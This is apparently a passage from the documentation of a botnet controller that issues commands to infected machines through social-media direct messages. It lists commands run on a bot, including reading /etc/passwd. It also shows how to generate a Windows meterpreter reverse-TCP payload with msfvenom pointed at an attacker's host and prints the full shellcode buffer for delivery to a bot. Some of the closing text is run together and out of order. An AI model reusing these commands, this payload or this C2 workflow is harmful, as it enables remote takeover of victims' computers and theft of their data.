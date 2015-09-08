Retrieve previous commands

As I said earlier, (previous) commands will be retrieved from older direct messages (limit is 200) and you can actually retrieve/see them by using the list_commands command

$ list_commands 8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1 VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1 9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1 aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1 8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1 $

Running shellcode (Windows hosts)

This option might be handy in order to retrieve a meterpreter session.

Generate your meterpreter shellcode, like:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python (...) Payload size: 299 bytes buf = "" buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68" buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5" buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec" buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02" buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a" buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53" buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9" buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6" buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"

This will send arequest and wait 10 seconds for them to answer. Direct messages will then be parsed - Bot list will be refreshed but also the command list, including new command outputs.Extract the shellcode and send it to the specified bot using thecommand!